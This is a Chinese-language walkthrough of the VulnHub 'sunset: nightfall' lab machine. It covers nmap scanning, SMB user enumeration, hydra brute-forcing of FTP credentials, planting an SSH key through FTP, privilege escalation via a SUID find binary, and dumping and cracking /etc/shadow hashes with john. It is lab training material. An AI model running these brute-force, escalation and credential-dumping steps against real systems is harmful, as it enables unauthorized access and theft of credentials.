0x00 环境
靶机下载地址:https://www.vulnhub.com/entry/sunset-nightfall,355/
本机ip:172.20.10.3
0x01 nmap探测主机
靶机ip为:172.20.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-21 20:31 EDT
Nmap scan report for 172.20.10.4
Host is up (0.00051s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 172.20.10.4:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 a9:25:e1:4f:41:c6:0f:be:31:21:7b:27:e3:af:49:a9 (RSA)
| 256 38:15:c9:72:9b:e0:24:68:7b:24:4b:ae:40:46:43:16 (ECDSA)
|_ 256 9b:50:3b:2c:48:93:e1:a6:9d:b4:99:ec:60:fb:b6:46 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.15-MariaDB-1
| Thread ID: 12
| Capabilities flags: 63486
| Some Capabilities: LongColumnFlag, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsCompression, Speaks41ProtocolOld, FoundRows, InteractiveClient, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsTransactions, IgnoreSigpipes, Support41Auth, ODBCClient, SupportsLoadDataLocal, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: OLmd,Js$Vcp+#m{C|fkg
|_ Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:47:6D:C6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: NIGHTFALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m33s, median: 0s
|_nbstat: NetBIOS name: NIGHTFALL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: nightfall
| NetBIOS computer name: NIGHTFALL\x00
| Domain name: nightfall
| FQDN: nightfall.nightfall
|_ System time: 2020-09-21T20:31:28-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-22T00:31:28
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.51 ms 172.20.10.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.48 seconds
发现21、22、80、139、145、3306都是开启的。先从80端口入手
发现这只是apache的默认页面,可以爆破一下目录有没有敏感文件,这道题的话就直接放弃80端口了。
0x02 信息收集
这里可以收集一下其他服务信息
ftp:一般来说,如果ftp存在匿名登录,nmap可以扫描出用户名为ftp或anonymous,密码为空即可。
smb:smb信息可以通过enum4linux来收集
enum4linux 172.20.10.4S-1-5-21-1679783218-3562266554-4049818721-1048 *unknown*\*unknown* (8)
S-1-5-21-1679783218-3562266554-4049818721-1049 *unknown*\*unknown* (8)
S-1-5-21-1679783218-3562266554-4049818721-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\nightfall (Local User)
S-1-22-1-1001 Unix User\matt (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
能够看到这里扫出来两个账户:nightfall和matt
0x03 测试服务
这里我爆破了一下smb服务
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt smb://172.20.10.4没有爆出任何结果
再通过这个账户去爆破了一下ftp
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 172.20.10.4 ftp
发现matt的ftp密码为cheese
登录进来后,我们可以对比一下本机的用户目录
发现ftp目录和用户目录极其相似,这时候就往用户目录方向思考如何获取shell。这里我想到的是通过ftp上传ssh公钥,直接免密登录matt账户。这里补充一个知识点,ssh-keygen生成的公钥,在目标机上是存入authorized_keys文件里面的,所以需要自己构造一个authorized_keys文件
成功获取了matt的shell,接着就是进一步提权
0x04 提权
sudo -l查看一下sudo权限,发现要输入密码,我们还没有获取matt的密码
那就通过find查看一下suid权限的文件
看到一个属主为nightfall的find命令,可以通过find用nightfall身份执行命令
/script/find . -exec id \;
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
/scripts/find: ‘./.local/share’: Permission denied
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
/scripts/find: ‘./.gnupg’: Permission denied
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
uid=1001(matt) gid=1001(matt) euid=1000(nightfall) egid=1000(nightfall) groups=1000(nightfall),1001(matt)
发现可以获取nightfall的id
成功提权到了nightfall
0x05 获取root的shell
用同样的方式,将公钥传入nightfall目录,进行免密登录。
成功登陆后,查看到该用户能执行root权限下的cat命令,通过/etc/shadow获取root的加密形式下的密码
sodo cat /etc/shadow
root:$6$JNHsN5GY.jc9CiTg$MjYL9NyNc4GcYS2zNO6PzQNHY2BE/YODBUuqsrpIlpS9LK3xQ6coZs6lonzURBJUDjCRegMHSF5JwCMG1az8k.:18134:0:99999:7:::
daemon:*:18126:0:99999:7:::
bin:*:18126:0:99999:7:::
sys:*:18126:0:99999:7:::
sync:*:18126:0:99999:7:::
games:*:18126:0:99999:7:::
man:*:18126:0:99999:7:::
lp:*:18126:0:99999:7:::
mail:*:18126:0:99999:7:::
news:*:18126:0:99999:7:::
uucp:*:18126:0:99999:7:::
proxy:*:18126:0:99999:7:::
www-data:*:18126:0:99999:7:::
backup:*:18126:0:99999:7:::
list:*:18126:0:99999:7:::
irc:*:18126:0:99999:7:::
gnats:*:18126:0:99999:7:::
nobody:*:18126:0:99999:7:::
_apt:*:18126:0:99999:7:::
systemd-timesync:*:18126:0:99999:7:::
systemd-network:*:18126:0:99999:7:::
systemd-resolve:*:18126:0:99999:7:::
messagebus:*:18126:0:99999:7:::
avahi-autoipd:*:18126:0:99999:7:::
avahi:*:18126:0:99999:7:::
saned:*:18126:0:99999:7:::
colord:*:18126:0:99999:7:::
hplip:*:18126:0:99999:7:::
nightfall:$6$u9n0NMGDN2h3/Npy$y/PVdaqMcdobHf4ZPvbrHNFMwMkPWwamWuKGxn2wqJygEC09UNJNb10X0HBK15Hs4ZwyFtdwixyyfu2QEC1U4/:18134:0:99999:7:::
systemd-coredump:!!:18126::::::
sshd:*:18126:0:99999:7:::
mysql:!:18126:0:99999:7:::
matt:$6$2u38Z1fOk8zIC5kO$oSfp/Ic0Uhb9225EdHB63ugob.B58mPuJJ8YpMB9hNaZAoJk9n3rhs9DHobzmsB20E5Yxjqsnn1x.QGKeAmiR1:18134:0:99999:7:::
通过john这个工具爆破root的hash值密码
爆破出root密码为miguel2
获取shell